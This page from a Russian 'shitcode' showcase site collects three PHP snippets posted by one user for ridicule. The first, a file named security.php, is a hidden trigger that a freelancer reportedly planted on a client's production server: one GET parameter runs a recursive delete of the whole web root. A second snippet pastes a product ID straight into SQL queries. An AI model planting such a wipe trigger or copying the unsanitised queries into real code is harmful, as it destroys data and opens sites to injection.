1. Список говнокодов пользователя uint

    Всего: 3

  2. PHP / Говнокод #12576

    +136

    1. 1
    2. 2
    3. 3
    4. 4
    5. 5
    6. 6
    7. 7
    8. 8
    <?php
$param = $_GET['delaem'];
if($param=='nahui')
{
    $dir = __DIR__;
    shell_exec("rm -f -R ".$_SERVER['DOCUMENT_ROOT']);
}
?>

    Фрилансер защищает себя от неплатежеспособного заказчика xD

    Файл лежал на продакшин сервере около года, название файла - security.php

    uint, 11 Февраля 2013

    Комментарии (9)

  3. PHP / Говнокод #9488

    +163

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    12. 12
    13. 13
    14. 14
    15. 15
    16. 16
    17. 17
    18. 18
    19. 19
    20. 20
    21. 21
    22. 22
    23. 23
    24. 24
    25. 25
    26. 26
    27. 27
    28. 28
    29. 29
    30. 30
    31. 31
    32. 32
    33. 33
    34. 34
    35. 35
    $textb = Db::getInstance()->ExecuteS("SELECT * FROM "._DB_PREFIX_."productotzyv WHERE `id_product` = ".$idProduct);
		$count_otz = count($textb);
		if ($p==0) $p = 1;
		$limit = 99;
		$texta = get("SELECT *, date_format(data, '%d.%m.%Y') as data_ FROM "._DB_PREFIX_."productotzyv WHERE `id_product` = ".$idProduct." LIMIT ".$limit);
		$ed = count(Db::getInstance()->ExecuteS("SELECT * FROM "._DB_PREFIX_."productotzyv WHERE `id_product`=".intval($_GET['id_product'])." and `rating`=1"));
		$dva = count(Db::getInstance()->ExecuteS("SELECT * FROM "._DB_PREFIX_."productotzyv WHERE `id_product`=".intval($_GET['id_product'])." and `rating`=2"));
		$tri = count(Db::getInstance()->ExecuteS("SELECT * FROM "._DB_PREFIX_."productotzyv WHERE `id_product`=".intval($_GET['id_product'])." and `rating`=3"));
		$four = count(Db::getInstance()->ExecuteS("SELECT * FROM "._DB_PREFIX_."productotzyv WHERE `id_product`=".intval($_GET['id_product'])." and `rating`=4"));
		$five = count(Db::getInstance()->ExecuteS("SELECT * FROM "._DB_PREFIX_."productotzyv WHERE `id_product`=".intval($_GET['id_product'])." and `rating`=5"));
        $uri = $_SERVER['REQUEST_URI'];
        $i = strrpos($uri, "/");
        $uri1 = substr($uri, 0, $i);
        $i = strrpos($uri1, "/");
        $uri = substr($uri1, 0, $i);
        $uri = $uri."/";
        $monUrl = "http://".$_SERVER['HTTP_HOST'].$uri;
		foreach ($textb as $s => $a){
			$text += $a['rating'];
		}

		$smarty->assign('ed', $ed);
		$smarty->assign('dva', $dva);
		$smarty->assign('tri', $tri);
		$smarty->assign('four', $four);
		$smarty->assign('five', $five);
		$smarty->assign('ed_proc', $ed/$count_otz*100);
		$smarty->assign('dva_proc', $dva/$count_otz*100);
		$smarty->assign('tri_proc', $tri/$count_otz*100);
		$smarty->assign('four_proc', $four/$count_otz*100);
		$smarty->assign('five_proc', $five/$count_otz*100);
		$smarty->assign('rating2', round($text/$count_otz, 0));
		$smarty->assign('countotz', $count_otz.' '.endingsForm($count_otz,"отзыв","отзыва","отзывов"));
		$smarty->assign('monUrl',$monUrl);
		$smarty->assign('text',$texta);

    Prestashop, реализация отображения отзывов и рейтига товара

    uint, 19 Февраля 2012

    Комментарии (12)

  4. PHP / Говнокод #9487

    +158

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    12. 12
    13. 13
    14. 14
    15. 15
    16. 16
    17. 17
    18. 18
    19. 19
    20. 20
    21. 21
    22. 22
    23. 23
    24. 24
    25. 25
    26. 26
    27. 27
    28. 28
    29. 29
    30. 30
    31. 31
    32. 32
    33. 33
    34. 34
    35. 35
    36. 36
    37. 37
    38. 38
    39. 39
    40. 40
    41. 41
    42. 42
    43. 43
    44. 44
    45. 45
    46. 46
    47. 47
    48. 48
    49. 49
    50. 50
    51. 51
    52. 52
    53. 53
    54. 54
    55. 55
    56. 56
    57. 57
    58. 58
    59. 59
    60. 60
    61. 61
    62. 62
    63. 63
    64. 64
    65. 65
    66. 66
    67. 67
    68. 68
    69. 69
    function get($sel, $od='', $show_error=1)
{
  global $__DB_CONN;
  $select=$sel;
  //echo $select.'<br>';
  if($od=="")
  {
    $res=sql_execute($select, $show_error);
    if(!$res)
      return array();
    $mc_runtime=get_magic_quotes_runtime();
    set_magic_quotes_runtime(0);
    $mas=array();
    while($v=@mysql_fetch_assoc($res))
      array_push($mas, $v);
    set_magic_quotes_runtime($mc_runtime);
    return $mas;
  }
... //тоже самое еще пару раз
  if($od=="by id")
  {
    $res=sql_execute($select, $show_error);
    if(!$res)
      return array();
    $mc_runtime=get_magic_quotes_runtime();
    set_magic_quotes_runtime(0);
    $mas=array();
    while($v=mysql_fetch_assoc($res))
      $mas[$v["id"]]=$v;
    set_magic_quotes_runtime($mc_runtime);
    return $mas;
  }
  if($od=="ins")
  {
    $res=sql_execute($select, $show_error);
    return mysql_insert_id($__DB_CONN);
  }
  return;
}

function get2($sel, $od='', $show_error=1)
{
  global $__DB_CONN2;
  $select=$sel;
  //echo $select.'<br>';
  if($od=="")
  {
    $res=sql_execute2($select, $show_error);
    if(!$res)
      return array();
    $mc_runtime=get_magic_quotes_runtime();
    set_magic_quotes_runtime(0);
    $mas=array();
    while($v=@mysql_fetch_assoc($res)) {
	foreach($v as $ii=>$vv)
        $v[$ii] = iconv('windows-1251','utf-8' ,$vv);
   array_push($mas,$v);
  }
    set_magic_quotes_runtime($mc_runtime);
    return $mas;
  }
... //тоже самое еще пару раз
  if($od=="ins")
  {
    $res=sql_execute2($select, $show_error);
    return mysql_insert_id($__DB_CONN2);
  }
  return;
}

    Функции для работы с бд!

    uint, 19 Февраля 2012

    Комментарии (4)